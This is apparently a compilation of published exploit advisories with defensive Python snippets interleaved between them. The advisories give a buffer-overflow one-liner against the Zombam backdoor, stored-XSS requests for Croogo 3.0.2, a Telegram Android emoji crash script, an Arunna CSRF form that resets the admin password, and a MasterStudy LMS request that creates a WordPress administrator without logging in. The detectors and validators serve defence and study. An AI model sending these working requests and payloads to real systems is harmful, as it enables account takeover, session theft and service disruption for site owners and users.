<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Zombam.b<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the EBP and EIP registers by sending a specially crafted HTTP request.<br />Type: PE32<br />MD5: 1e3665a67201209609ae493a2a590bee<br />Vuln ID: MVID-2022-0487<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 02/16/2022 <br /><br />Memory Dump:<br />(148c.dd4): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=9d082a1a edx=00000000 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0538f194 ebp=0538f324 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:006> .ecxr<br />eax=00000000 ebx=040202b0 ecx=9d082a1a edx=00000000 esi=0538fb51 edi=04020330<br />eip=41414141 esp=0538fab4 ebp=41414141 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />41414141 ?? 
???<br /><br />0:006> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />FAULTING_IP: <br />+3485<br />41414141 ?? ???<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 41414141<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />READ_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br />00403485 50 push eax<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+3485<br />41414141 ?? 
???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000dd4<br /><br />BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 41414141<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />FRAME_ONE_INVALID: 1<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 41414141<br /><br />STACK_TEXT: <br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />
<br />STACK_COMMAND: ~6s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: e9<br /><br />SYMBOL_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee<br /><br />IMAGE_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3e780ebf<br /><br />FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br /><br />Exploit/PoC:<br />python -c "print('GET /'+'A'*15028 +' HTTP/1.0\r\nHost: 192.168.18.125\r\n\r\n')" | nc64.exe 192.168.18.125 80 -v<br />125.18.168.192.in-addr.arpa [192.168.18.125] 80 (http) open<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. 
Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
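A network-side check for the condition the advisory describes, added here as an example and not part of Malvuln's advisory: it parses a raw HTTP request line and flags request targets that exceed a length budget or consist of one repeated byte, the fill pattern that surfaces as 41414141 in the crash dump above. The threshold values, the sample requests and the 192.0.2.10 address are constructed assumptions.

```python
import re

# Policy values for this example (assumptions, not from the advisory): mainstream
# HTTP servers cap the request line around 8 KB, and a small RAT with a fixed
# stack buffer needs far less, so anything beyond this budget is suspect.
MAX_TARGET_LEN = 2048
MIN_FILL_RUN = 256   # a run this long of one byte is a classic overflow probe

REQUEST_LINE_RE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")


def parse_request_line(raw: bytes):
    """Return (method, target, version) from the first line of a raw request,
    or None when that line is not a well-formed HTTP/1.x request line."""
    first_line = raw.split(b"\r\n", 1)[0]
    m = REQUEST_LINE_RE.match(first_line)
    if not m:
        return None
    return m.group(1).decode("ascii"), m.group(2), m.group(3).decode("ascii")


def longest_single_byte_run(data: bytes):
    """Length and value of the longest run of one repeated byte in data."""
    best_len, best_byte, run, prev = 0, None, 0, None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        if run > best_len:
            best_len, best_byte = run, b
    return best_len, best_byte


def inspect_request(raw: bytes) -> dict:
    """Classify one raw HTTP request; findings are short strings fit for a log."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return {"findings": ["malformed-request-line"], "target_len": None}
    method, target, version = parsed
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append(f"oversized-target:{len(target)}")
    run_len, run_byte = longest_single_byte_run(target)
    if run_len >= MIN_FILL_RUN:
        findings.append(f"fill-pattern:0x{run_byte:02x}x{run_len}")
    return {"method": method, "version": version,
            "target_len": len(target), "findings": findings}


def register_as_bytes(value: int) -> bytes:
    """Little-endian bytes of a 32-bit register value. For the dump's EIP,
    0x41414141 -> b'AAAA': the request bytes that landed on the saved return
    address, which !analyze labels an exploitable fill pattern."""
    return value.to_bytes(4, "little")


# Constructed samples (not captured traffic): one benign request and one
# shaped like the advisory's PoC, 15028 'A's in the request target.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: 192.0.2.10\r\n\r\n"
OVERFLOW_PROBE = b"GET /" + b"A" * 15028 + b" HTTP/1.0\r\nHost: 192.0.2.10\r\n\r\n"

if __name__ == "__main__":
    for sample in (BENIGN, OVERFLOW_PROBE):
        print(inspect_request(sample))
    print(register_as_bytes(0x41414141))
```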
<pre><code># Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)<br /># Date: 06/12/2021<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==<br /><br />POST /admin/file-manager/attachments/add HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730<br />Content-Length: 923<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/add<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="file"; filename="file.txt"<br />Content-Type: <script>alert(document.cookie)</script><br 
/><br />Enes Ozeser (@enesozeser)<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------114221148012003093972656004730--<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==<br /><br />POST /admin/taxonomy/types/edit/5 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 590<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)admin/taxonomy/types/edit/5<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&<br />comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&<br 
/>format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==<br /><br />POST /admin/blocks/regions/edit/3 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 336<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/blocks/regions/edit/3<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==<br /><br />POST /admin/file-manager/attachments/edit/20 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 363<br />Origin: http://(HOST)<br 
/>Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/edit/20<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply<br /></code></pre>
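The first request above shows that the Content-Type the client supplies for the uploaded part is stored and rendered back unescaped. The following is an added example (not Croogo's code) of how a server should treat that header: parse the part, validate the value against the RFC 2045 token grammar and an allowlist, and escape it on output. The boundary, the allowlist and the sample body are constructed for this example.

```python
import html
import re

# RFC 2045 "token" characters: no whitespace and none of the tspecials, so
# < > ( ) " / ; = cannot appear inside a type or subtype.
TOKEN = r"[A-Za-z0-9!#$%&'*+\-.^_`|~]+"
MIME_TYPE_RE = re.compile(rf"^{TOKEN}/{TOKEN}$")

# Constructed allowlist for this example; not Croogo's own upload policy.
ALLOWED_UPLOAD_TYPES = {"text/plain", "image/png", "image/jpeg", "application/pdf"}


def parse_multipart(body: bytes, boundary: bytes):
    """Minimal multipart/form-data splitter returning [(headers, data), ...].
    Header values come back exactly as the client sent them, which is the
    point: a part's Content-Type is attacker-controlled input, not a fact."""
    delimiter = b"--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        parts.append((headers, data.rstrip(b"\r\n")))
    return parts


def uploaded_part_type(parts, field="file"):
    """Client-supplied Content-Type of the part whose form field is `field`."""
    for headers, _ in parts:
        if re.search(rf'name="{re.escape(field)}"', headers.get("content-disposition", "")):
            return headers.get("content-type")
    return None


def is_safe_mime_type(value: str) -> bool:
    """True only for a bare type/subtype made of RFC 2045 token characters."""
    return len(value) <= 127 and MIME_TYPE_RE.match(value) is not None


def accepted_file_type(client_type: str) -> str:
    """Type to store for an upload: syntactically valid and allowlisted, else
    the neutral default. The raw client string is never stored."""
    media_type = client_type.split(";", 1)[0].strip().lower()
    if is_safe_mime_type(media_type) and media_type in ALLOWED_UPLOAD_TYPES:
        return media_type
    return "application/octet-stream"


def render_type_cell(stored_type: str) -> str:
    """Output encoding for the attachments listing: defence in depth in case
    an unvalidated value ever reached the database."""
    return "<td>" + html.escape(stored_type, quote=True) + "</td>"


# Constructed body modeled on the advisory's request (own boundary, own text).
BOUNDARY = b"----ConstructedBoundary1234"
POC_BODY = (
    b"------ConstructedBoundary1234\r\n"
    b'Content-Disposition: form-data; name="file"; filename="file.txt"\r\n'
    b"Content-Type: <script>alert(document.cookie)</script>\r\n"
    b"\r\n"
    b"sample text\r\n"
    b"------ConstructedBoundary1234--\r\n"
)

if __name__ == "__main__":
    raw_type = uploaded_part_type(parse_multipart(POC_BODY, BOUNDARY))
    print("client sent:", raw_type)
    print("stored as:", accepted_file_type(raw_type))
    print(render_type_cell(raw_type))
```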
<pre><code>Document Title:<br />===============<br />Telegram Android v8.4.4 - Denial of Service (PoC)<br /><br /><br />References (Source):<br />====================<br />https://twitter.com/h4shur<br /><br /><br />Release Date:<br />=============<br />2022-01-30<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.8<br /><br /><br />Product & Service Introduction:<br />===============================<br />Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)<br />service. The service also provides end-to-end encrypted video calling,<br />VoIP, file sharing and several other features. It was launched for iOS on<br />14 August 2013 and Android in October 2013. The servers of Telegram are<br />distributed worldwide to decrease frequent data load with five data centers<br />in different regions, while the operational center is based in Dubai in the<br />United Arab Emirates. Various client apps are available for desktop and<br />mobile platforms including official apps for Android, iOS, Windows, macOS<br />and Linux (although registration requires an iOS or Android device and a<br />working phone number). There are also two official Telegram web twin apps –<br />WebK and WebZ – and numerous unofficial clients that make use of Telegram's<br />protocol. All of Telegram's official components are open source, with the<br />exception of the server which is closed-sourced and proprietary.<br /><br />Telegram provides end-to-end encrypted voice and video calls and optional<br />end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted<br />between the app and the server, so that ISPs and other third-parties on the<br />network can't access data, but the Telegram server can. Users can send text<br />and voice messages, make voice and video calls, and share an unlimited<br />number of images, documents (2 GB per file), user locations, animated<br />stickers, contacts, and audio files. 
In January 2021, Telegram surpassed<br />500 million monthly active users. It was the most downloaded app worldwide<br />in January 2021 with 1 billion downloads globally as of late August 2021.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent vulnerability researcher discovered vulnerabilities in the<br />Telegram Android application.<br /><br /><br />Affected Product(s):<br />====================<br />Vendor: telegram.org / telegram.me / t.me<br />Product: Android Telegram application (Android-Application)<br />https://telegram.org/android<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-30: Researcher Notification & Coordination (Security Researcher)<br />2022-01-30: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />local<br /><br /><br />Severity Level:<br />===============<br />medium<br /><br /><br />Disclosure Type:<br />================<br />Full Disclosure<br /><br /><br />Technical specifications and description:<br />=========================================<br />1.1<br />In version 8.4.4 of the Telegram Android application, a denial of service<br />vulnerability was discovered by H4shur. 
The vulnerability lies in the messenger's handling of emoji.<br /><br />1.2<br />If you send a message containing a number of flag emojis together with any text on the chat page,<br />tapping that message crashes the application outright, so it stops<br />providing service.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />1.1<br />To reproduce the denial of service, follow the steps below.<br /><br /><br />PoC: Exploitation<br />1.1<br />Run the Python script; it creates a new file "outputbufferh4shur.txt".<br />1.2<br />Open Telegram for Android and go to "Saved Messages" or any chat page.<br />1.3<br />Copy the content of the file "outputbufferh4shur.txt".<br />1.4<br />Paste the content of outputbufferh4shur.txt into the "Write a message..." field<br />and then add any text to the message.<br />1.5<br />Oops...<br />Telegram Crashed <3<br /><br /><br />script:<br /># 114 Iranian-flag emoji; each flag is two regional-indicator code points.<br />bufferh4shur = "🇮🇷" * 114<br />try:<br />    # Explicit UTF-8: the default encoding on Windows cannot represent emoji.<br />    with open("outputbufferh4shur.txt", "w", encoding="utf-8") as f:<br />        f.write(bufferh4shur)<br />    # Report the real on-disk size, not the code-point count len() gives.<br />    print("[!] Creating %d bytes DOS payload...." % len(bufferh4shur.encode("utf-8")))<br />    print("[!] File Created!")<br />except OSError as e:<br />    print("File cannot be created: %s" % e)<br /><br /><br /><br />Security Risk:<br />==============<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br /><br /><br />Credits & Authors:<br />==================<br />h4shur<br />Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur<br />h4shursec@gmail.com<br /></code></pre>
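An added example, not part of the advisory or of Telegram's code, that counts the flag sequences the PoC relies on: a flag is a pair of regional-indicator code points, so the payload the script writes is 228 code points, 912 UTF-8 bytes and 114 flags. The per-message flag budget in should_render_eagerly is an assumption for illustration.

```python
RI_FIRST, RI_LAST = 0x1F1E6, 0x1F1FF   # Regional Indicator Symbol Letters A..Z


def is_regional_indicator(ch: str) -> bool:
    return RI_FIRST <= ord(ch) <= RI_LAST


def count_flag_sequences(text: str) -> int:
    """Count emoji flags, i.e. pairs of regional indicators, pairing greedily
    left to right the way renderers do. Any other character breaks a pair and
    a trailing lone indicator is not a flag."""
    flags, pending = 0, False
    for ch in text:
        if is_regional_indicator(ch):
            if pending:
                flags += 1
                pending = False
            else:
                pending = True
        else:
            pending = False
    return flags


def message_stats(text: str) -> dict:
    """Three sizes of one message: what len() reports (code points), what the
    wire carries (UTF-8 bytes) and what the renderer must lay out (flags)."""
    return {"code_points": len(text),
            "utf8_bytes": len(text.encode("utf-8")),
            "flags": count_flag_sequences(text)}


def should_render_eagerly(text: str, max_flags: int = 50) -> bool:
    """Client-side guard (an assumption for this example, not Telegram's
    code): above a flag budget, fall back to a plain-text or lazy path
    instead of laying out every flag glyph at once."""
    return count_flag_sequences(text) <= max_flags


# Constructed input shaped like the advisory's payload: 114 Iranian flags
# followed by the "any text" the steps ask for.
POC_TEXT = "\U0001F1EE\U0001F1F7" * 114 + " any text"

if __name__ == "__main__":
    print(message_stats(POC_TEXT))
    print("render eagerly:", should_render_eagerly(POC_TEXT))
```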
<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)<br /># Date: November 29, 2021<br /># Exploit Author: =(L_L)=<br /># Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/<br /># Vendor Homepage: https://github.com/arunna<br /># Software Link: https://github.com/arunna/arunna<br /># Version: 1.0.0<br /># Tested on: Ubuntu 20.04.2 LTS<br /><br /><!--<br />The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). <br />--><br /><br /><html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr><br /><tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr><br /><tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr><br /><tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr><br /><tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr><br /><tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr><br /><tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr><br /><tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr><br /><tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr><br /><tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr><br /><tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr><br /><tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr><br /><tr><td>tags[0]</td><td><input type="text" 
value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr><br /><tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr><br /><tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr><br /><tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr><br /><tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr><br /><tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr><br /><tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr><br /><tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr><br /><tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr><br /></table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html><br /><br /></code></pre>
<pre><code># Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation<br /># Date: 16.02.2022<br /># Author: Numan Türle<br /># CVE: CVE-2022-0441<br /># Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/<br /># Version: <2.7.6<br /># https://www.youtube.com/watch?v=SI_O6CHXMZk<br /># https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6<br /># https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed<br /><br /><br />POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1<br />Connection: close<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br />Content-Type: application/json<br />Content-Length: 339<br /><br />{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}<br /> <br /><br /></code></pre>
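The request above reaches administrator by smuggling a wp_capabilities entry inside profile_default_fields_for_register, so the fix belongs on the server. The following Python validator is an added illustration (not the plugin's patch or the advisory author's code) of that check: an allowlist of profile keys (the names are assumed, the plugin's real list is not on this page), a hard reject of any privilege-bearing meta key whatever the table prefix, and a role the server assigns itself.

```python
import json

# Assumed allowlist of extra profile keys a self-registration may set; the
# plugin's real field list is not on this page, so these names are hypothetical.
ALLOWED_PROFILE_FIELDS = {"degree", "expertize", "auditory"}
# WordPress keeps roles in the "<table_prefix>capabilities" user-meta key
# (wp_capabilities by default) and the legacy "<table_prefix>user_level" key.
PRIVILEGE_META_SUFFIXES = ("capabilities", "user_level")
DEFAULT_ROLE = "subscriber"

# The body from the advisory above, kept here to show that it is rejected.
POC_BODY = ('{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD",'
            '"user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,'
            '"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],'
            '"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}')

class RegistrationRejected(ValueError):
    """Raised when a registration body tries to set a privilege-bearing key."""

def is_privilege_meta_key(key):
    """True for wp_capabilities, wp_user_level and any custom-prefix variant."""
    k = str(key).lower()
    return any(k.endswith(suffix) for suffix in PRIVILEGE_META_SUFFIXES)

def sanitize_registration(raw_body):
    """Parse the JSON body of stm_lms_register and return only what the server
    may persist; the role is server-assigned, never read from the request."""
    data = json.loads(raw_body)
    extra = data.get("profile_default_fields_for_register") or {}
    if not isinstance(extra, dict):
        raise RegistrationRejected("profile_default_fields_for_register must be an object")
    for key in extra:
        if is_privilege_meta_key(key):   # reject, do not silently drop: worth logging
            raise RegistrationRejected(f"client may not set user meta {key!r}")
    meta = {k: v for k, v in extra.items() if k in ALLOWED_PROFILE_FIELDS}
    return {"user_login": data["user_login"], "user_email": data["user_email"],
            "role": DEFAULT_ROLE, "meta": meta}

def poc_is_rejected():
    """True when the advisory's request body is refused by sanitize_registration."""
    try:
        sanitize_registration(POC_BODY)
    except RegistrationRejected:
        return True
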